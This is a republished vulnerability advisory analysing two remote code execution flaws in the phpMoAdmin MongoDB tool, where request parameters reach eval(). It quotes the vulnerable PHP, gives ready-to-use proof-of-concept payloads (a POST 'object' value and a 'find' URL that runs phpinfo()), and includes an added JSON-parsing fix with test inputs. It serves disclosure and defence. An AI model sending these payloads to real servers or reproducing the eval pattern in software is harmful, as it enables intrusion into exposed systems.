PhpMoAdmin vulnerability analysis report-vulnerability warning-the black bar safety net

ID MYHACK58:62201559587
Type myhack58
Reporter Anonymous
Modified 2015-03-04T00:00:00


phpMoAdmin is a convenient online MongoDB management tool written in PHP. It can create, delete and modify databases and indexes, view and search data, show database uptime and memory statistics, and import and export data in JSON format.

Recently a hacker named sp1nlock published an arbitrary code execution vulnerability in phpMoAdmin; the vulnerability can lead to the compromise of anyone running the management program.

After a brief analysis, a researcher from the Alibaba Attack and Defense Laboratory found another, similar remote code execution vulnerability (0day) in this application.


0x01 Analysis of the disclosed vulnerability

The vulnerable file moadmin.php does not verify login permissions.

    public function __construct () {
        ... lines omitted ...
        $action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections');
        if (isset($_POST['object'])) { // the object parameter is passed via POST
            if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { // passed straight into saveObject, leading to the code execution vulnerability
                return $this->_dumpFormVals();

The saveObject function:

    public function saveObject($collection, $obj) {
        eval('$obj=' . $obj . ';'); // $obj is attacker-controlled and is passed directly to eval
        return $this->mongo->selectCollection($collection)->save($obj);
    }


0x02 Exploitation

Pass object=1;phpinfo(); via POST.


0x03 0day analysis

The program contains a further arbitrary code execution vulnerability, located at lines 552-557 in the listRows function.


    public function listRows($collection) {
        foreach ($this->sort as $key => $val) {
            //cast vals to int
            $sort[$key] = (int) $val;
        }
        $col = $this->mongo->selectCollection($collection);
        $find = array();
        if (isset($_GET['find']) && $_GET['find']) { // the find variable arrives via GET
            $_GET['find'] = trim($_GET['find']);
            if (strpos($_GET['find'], 'array') === 0) { // only checks that $find begins with "array"; this is the vulnerable spot
                eval('$find = ' . $_GET['find'] . ';'); // passed to eval, so arbitrary code is executed
            } else if (is_string($_GET['find'])) {
                if ($findArr = json_decode($_GET['find'], true)) {
                    $find = $findArr;
                }
            }
        }
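Both vulnerabilities above share one root cause: request data (object in saveObject, find in listRows) is concatenated into a string and handed to eval(). The following is an added example, not phpMoAdmin's own code, showing how the find branch (and, with the same parser, the object branch) can be rewritten so that input is parsed strictly as JSON and never evaluated as PHP; the function names and the $where check are this example's own choices, and the missing login check on moadmin.php is a separate fix.

```php
<?php
// Added example, not phpMoAdmin's code: a replacement for the eval()
// branches in listRows() and saveObject(). Input is decoded as JSON only,
// so "array();phpinfo();exit;" is a syntax error, never executed code.
declare(strict_types=1);

function rejectDangerousOperators(array $filter): void
{
    // $where lets a caller run server-side JavaScript inside MongoDB, so a
    // filter built from request data must not contain it at any depth.
    foreach ($filter as $key => $value) {
        if ($key === '$where') {
            throw new InvalidArgumentException('operator $where is not allowed');
        }
        if (is_array($value)) {
            rejectDangerousOperators($value);
        }
    }
}

function parseFindFilter(?string $raw): array
{
    $raw = trim((string) $raw);
    if ($raw === '') {
        return []; // no filter: match everything, as the original does
    }
    // json_decode replaces eval(): PHP code in the input is a JSON syntax error.
    $decoded = json_decode($raw, true, 16, JSON_THROW_ON_ERROR);
    if (!is_array($decoded)) {
        throw new InvalidArgumentException('find must be a JSON object');
    }
    rejectDangerousOperators($decoded);
    return $decoded;
}

// Constructed inputs: the payload quoted on this page, a normal filter,
// and a filter that smuggles in $where.
$samples = [
    'array();phpinfo();exit;',
    '{"name": "alice", "age": {"$gt": 30}}',
    '{"$where": "this.a == 1"}',
];
foreach ($samples as $s) {
    try {
        echo "accepted: " . json_encode(parseFindFilter($s)) . "\n";
    } catch (Throwable $e) {
        echo "rejected: " . $e->getMessage() . "\n";
    }
}
```

Only the second sample is accepted; the first fails JSON decoding and the third is refused by the operator check.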

0x04 0day exploitation

There is not much to it: two evals found with a casual search. The SecPulse editor gives the request directly: http://ip/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;


【Original: Alibaba Security Research Lab - conqu3r; compiled and published by the SP editor】